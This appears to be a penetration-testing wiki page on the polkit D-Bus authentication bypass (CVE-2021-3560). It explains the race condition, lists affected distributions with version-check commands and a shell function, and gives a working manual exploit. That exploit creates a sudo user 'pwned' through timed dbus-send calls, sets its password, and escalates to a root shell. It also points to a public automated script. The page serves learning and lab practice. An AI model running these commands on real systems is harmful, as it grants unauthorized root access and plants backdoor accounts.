# D-Bus Authentication Bypass

## Theory

The vulnerability can be boiled down to these steps:

1. The attacker manually sends a dbus message to the accounts-daemon requesting the creation of a new account with sudo permissions (or latterly, a password to be set for the new user). This message gets given a unique ID by the dbus-daemon.
2. The attacker kills the message after polkit receives it, but before polkit has a chance to process the message. This effectively destroys the unique message ID.
3. Polkit asks the dbus-daemon for the user ID of the user who sent the message, referencing the (now deleted) message ID.
4. The dbus-daemon can't find the message ID because we killed it in step two. It handles the error by responding with an error code.
5. Polkit mishandles the error and substitutes in 0 for the user ID -- i.e. the root account of the machine.
6. Thinking that the root user requested the action, polkit allows the request to go through unchallenged.

In short, by destroying the message ID before the dbus-daemon has a chance to give polkit the correct ID, we exploit the poor error-handling in polkit to trick the utility into thinking that the request was made by the all-powerful root user. - [TryHackMe](broken://spaces/hhJPQlmTdlPBQjXz6mN2/pages/DR79PxBPUbR3EGAMAFwG)

See the full explanation of the vulnerability in Kevin Backhouse's article on the GitHub blog: [Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug](https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/).

## Practice

{% tabs %}
{% tab title="Enumeration" %}
Many of the most popular Linux distributions did not ship a vulnerable polkit version until relatively recently. The following targets are known to ship an affected version:

* RHEL 8
* Fedora 21 (or later)
* Debian testing (“bullseye”)
* Ubuntu 20.04 LTS ("Focal Fossa")

Other distributions may also be vulnerable if the installed polkit package is an affected version. Affected versions are **0.113** (or later) for `rhel,centos,fedora` and **0.105-26** for `Debian/Ubuntu`.

```bash
#Debian/Ubuntu
apt list --installed | grep policykit-1
dpkg -l | grep -i polkit|grep -i "0.105-26"

# RHEL/CentOS/Fedora
rpm -qa | grep -i polkit|grep -i '0.11[3-9]'
```
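The greps above only substring-match the version string. As an added example (not from the original page), the following POSIX shell function classifies a polkit package version against the affected ranges stated above; it assumes, from the Backhouse article, that the upstream fix shipped in 0.119, so the rpm range is treated as 0.113 <= version < 0.119. Distributions backport fixes without bumping the version, so a match means "check the package changelog", not confirmed exposure.

```shell
#!/bin/sh
# Added example, not from the original page: classify a polkit package version
# against the affected ranges named above (0.113 or later on RHEL/CentOS/Fedora,
# 0.105-26 on Debian/Ubuntu). Assumption: upstream fix shipped in 0.119, so the
# rpm range is 0.113 <= version < 0.119. Backported fixes keep the old version
# number, so treat a match as a prompt to review the package changelog.

# polkit_affected FAMILY VERSION
#   FAMILY   deb (Debian/Ubuntu) or rpm (RHEL/CentOS/Fedora)
#   VERSION  the package version string as printed by dpkg -l / rpm -qa
# Exit status: 0 = in the affected range, 1 = outside it, 2 = bad input.
polkit_affected() {
    family=$1
    ver=$2
    case "$family" in
        deb)
            # The page names the 0.105-26 build; match it with any distro suffix.
            case "$ver" in
                0.105-26*) return 0 ;;
                *)         return 1 ;;
            esac
            ;;
        rpm)
            # Split "0.115-11.el8" into major=0, minor=115 (drop release suffix).
            major=${ver%%.*}
            rest=${ver#*.}
            minor=$(printf '%s' "$rest" | sed 's/[^0-9].*//')
            [ -n "$minor" ] || return 2
            [ "$major" -eq 0 ] && [ "$minor" -ge 113 ] && [ "$minor" -le 118 ]
            ;;
        *)
            echo "polkit_affected: unknown family '$family'" >&2
            return 2
            ;;
    esac
}

# Convenience wrapper: query the installed version on this host, if a package
# manager is present, and return the verdict of polkit_affected.
polkit_check_host() {
    if command -v dpkg-query >/dev/null 2>&1; then
        v=$(dpkg-query -W -f '${Version}' policykit-1 2>/dev/null) && polkit_affected deb "$v"
    elif command -v rpm >/dev/null 2>&1; then
        v=$(rpm -q --qf '%{VERSION}-%{RELEASE}' polkit 2>/dev/null) && polkit_affected rpm "$v"
    else
        return 2
    fi
}
```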

Additionally, this exploit only works on distributions that have `accountsservice` and `gnome-control-center` installed.

```bash
#Debian/Ubuntu
dpkg -l  | grep -i 'accountsservice'
dpkg -l  | grep -i 'gnome-control-center'

# RHEL/CentOS/Fedora
rpm -qa  | grep -i 'accountsservice'
rpm -qa  | grep -i 'gnome-control-center'
```

{% endtab %}

{% tab title="Manual Exploit" %}
First, send a dbus message to create a new user:

```bash
# string:pwned: the name of the new user, "pwned".
# string:"Account Desc": the description of the new user.
# int32:1: sudo group
$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:pwned string:"Account Desc" int32:1 & sleep 0.005s; kill $!

# Check if it worked
$ id pwned
uid=1000(pwned) gid=1000(pwned) groups=1000(pwned),27(sudo)
```

Second, generate a password hash and set it with a dbus message:

```bash
# Generate a SHA-512 password hash (-6)
openssl passwd -6 password123

# Dbus message: User1000 is the object path of the uid 1000 account created above;
# the second string is the password hint
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<password_hash>' string:'Ask the tester' & sleep 0.005s; kill $!
```

Third, log in to the new account and spawn a privileged shell:

```bash
# Switch to the new user
user$ su - pwned

# Spawn a root shell
pwned$ sudo su root
```

{% endtab %}

{% tab title="Auto Exploit" %}
To automate this process, we can use [this exploit](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation) by Secnigma.

```bash
# Add user with creds secnigma:secnigmaftw
./poc.sh

# Add your own user
./poc.sh -u=MyUser -p=MyPassword
```

{% hint style="danger" %}
Do not run this script from a graphical login session.
{% endhint %}
{% endtab %}
{% endtabs %}

## Resources

{% embed url="https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/" %}

{% embed url="https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/polkit-privilege-escalation/#cve-2021-3560" %}

{% embed url="https://tryhackme.com/room/polkit" %}

